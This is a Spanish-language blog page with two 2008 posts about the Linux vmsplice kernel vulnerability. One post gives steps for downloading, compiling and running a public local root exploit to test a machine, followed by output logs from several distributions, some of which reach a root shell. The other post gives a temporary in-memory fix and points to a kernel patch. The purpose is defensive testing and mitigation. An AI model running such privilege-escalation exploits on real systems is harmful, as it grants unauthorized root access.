citrix, ethernet, exploits, freebsd, html, kernel, linux, redes-sociales, seguridad, vmsplice, vulnerabilidades, web20
Filtro activo: »kernel« (Haga click en el filtro activo para quitarlo o seleccione otra palabra de la lista de arriba.)
ERRORS ARE IMMINENT
vida y milagros de un programador
Syndication
Categorías
- calculadoras (2)
- citrix (1)
- cursos (1)
- databases (0)
- educacion (1)
- ethernet (1)
- internet (1)
- nepal (24)
- networking (1)
- openbsd (0)
- programacion (0)
- scratch (1)
- scripts (1)
- seguridad (6)
- sistemas (6)
- sistemas: mainframes (0)
- sistemas: minicomputers (0)
- sistemas: psion (0)
- sistemas: retro (1)
- web20 (4)
Archivo
- Abril 2008 (1)
- Marzo 2008 (5)
- Febrero 2008 (21)
- Enero 2008 (1)
- Noviembre 2007 (1)
- Julio 2007 (1)
- Junio 2007 (23)
Internet Social
Retro
Mi otro contenido
Blosxom
Bugs
Utils
12/02/2008
Fix temporal para el bug vmsplice
por joakinen@ a las 18:49
En http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c, el mismo paisano que ha programado el exploit ha programado la forma de deshabilitar vmsplice en el código del kernel que se está ejecutando en memoria, y así eliminamos la vulnerabilidad de momento, hasta que cambiemos nuestro kernel a uno nuevo que no tenga esta vulnerabilidad.
$ wget http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c $ gcc disable-vmsplice-if-exploitable.c -o disable-vmsplice-if-exploitable $ sudo ./disable-vmsplice-if-exploitable Password: ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- Exploit gone! $Ejecutamos ahora de nuevo el exploit (cuyo fuente lo he llamado exploit-vmslice.c y el binario exploit-vmslice) y comprobamos que ya no conseguimos acceso root
$ ./exploit-vmsplice ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7e3c000 .. 0xb7e6e000 [-] vmsplice $Como comenté arriba, este parche actúa sobre la memoria, no sobre el código que se carga cuando el sistema se inicia, por tanto al reiniciar la máquina vuelve a ser vulnerable. La solución temporal es ejecutar este parche en el script de inicio del sistema.
Otra opción es parchear el fuente de splice.c (que es donde está el fallo) con el diff publicado en http://www.alu.ua.es/j/jgl14/patch-vmsplice-2.6.24.1.diff.gz y recompilar e instalar el nuevo kernel.
¿Te ha gustado? - Digg Me! | Add to del.icio.us! | reddit this!
permalink | categoría: /seguridad | Etiquetas: exploits, freebsd, kernel, linux, patch, seguridad, vmsplice, vulnerabilidades
Bug vmsplice en kernel Linux > 2.6.17. Sistemas vulnerables.
por joakinen@ a las 17:02
Después de que Linus Torvalds llamara incompetent idiots a la gente de FreeBSD por no implementar vmsplice() en su kernel y hacerlo mediante COW (copy-on-write), ahora parece que tendrá que morderse la lengua por haber introducido en todos los kernel superiores a 2.6.17 junto con vmsplice() un bug muy fácil de explotar, tanto que ya está el fuente del exploit (en Kriptópolis, por ejemplo) que cualquiera puede bajarse y compilar.
¿Te ha gustado? - Digg Me! | Add to del.icio.us! | reddit this!
Este bug permite a un usuario hacerse root sin tener que dar ninguna contraseña. La versión del kernel 2.6.24.2, disponible en kernel.org ya tiene resuelto este problema.
La lista completa de versiones del kernel vulnerables la ha publicado Security Focus.
Para saber si tu máquina es vulnerable:
1. Accede a la página web del exploit y copialo a un fichero local, por ejemplo, exploit.c 2. Compílalo con la orden $ gcc exploit.c 3. Esto genera un fichero binario llamado a.out que puedes ejecutar directamente $ ./a.out
Descarga del exploit
El código fuente del exploit lo tienes en http://www.milw0rm.com/exploits/5092Copialo al portapapeles y lo pegas en tu terminal en un fichero vacío.
Pruebas de vulnerabilidad
Ubuntu 6.06 LTS Dapper Drake, kernel 2.6.15-51-386
No está afectado, al ser un kernel anterior al 2.6.17$ uname -a Linux jhp1 2.6.15-51-386 #1 PREEMPT Thu Dec 6 20:20:49 UTC 2007 i686 GNU/Linux $ gcc exploit.c $ ./a.out ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7dc2000 .. 0xb7df4000 [-] vmsplice: Function not implemented $
Ubuntu 6.10 Edgy - Server Edition, kernel 2.6.17-10-server
Vulnerable.$ uname -a Linux srv1 2.6.17-10-server #2 SMP Tue Dec 5 22:29:32 UTC 2006 i686 GNU/Linux $ gcc exploit.c $ ./a.out ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7e5a000 .. 0xb7e8c000 [+] root #
Ubuntu 7.04 Feisty Fawn, kernel 2.6.20.16-386
No parece estar afectado: el exploit se compila pero la ejecución da un fallo de segmentación al intentar llamar a vsplice. Al parecer algunos de los kernel de Ubuntu no ponen vmsplice en enable a no ser que se haga deliberadamente, esa podría ser la razón de que el exploit termine con un fallo de segmentación.$ uname -a Linux jhp2 2.6.20-16-386 #2 Tue Dec 18 05:41:44 UTC 2007 i686 GNU/Linux $ gcc exploit.c $ ./a.out ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7e2c000 .. 0xb7e5e000 Fallo de segmentación (core dumped) $
Ubuntu 7.10 Gutsy Gibbon, kernel 2.6.22-14-generic
Vulnerable$ uname -a Linux panic 2.6.22-14-generic #1 SMP Fri Feb 1 04:59:50 UTC 2008 i686 GNU/Linux $ gcc exploit.c $ ./a.out ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7ddb000 .. 0xb7e0d000 [+] root #
Debian Etch, kernel 2.6.18-5-686
Vulnerable$ uname -a Linux maiky 2.6.18-5-686 #1 SMP Wed Oct 3 00:12:50 UTC 2007 i686 GNU/Linux $ gcc exploit.c $ ./a.out ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7d81000 .. 0xb7db3000 [+] root #
Open SuSE 10.2, kernel 2.6.18.2-34-default
Vulnerable$ uname -a Linux lumi 2.6.18.2-34-default #1 SMP Mon Nov 27 11:46:27 UTC 2006 i686 i686 i386 GNU/Linux $ gcc exploit.c $ ./a.out ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7da2000 .. 0xb7dd4000 [+] root #Gracias a Sergio y Maseda por aportar los resultados en sus máquinas
¿Te ha gustado? - Digg Me! | Add to del.icio.us! | reddit this!
permalink | categoría: /seguridad | Etiquetas: exploits, freebsd, kernel, linux, seguridad, vmsplice, vulnerabilidades
Historias relacionadas:
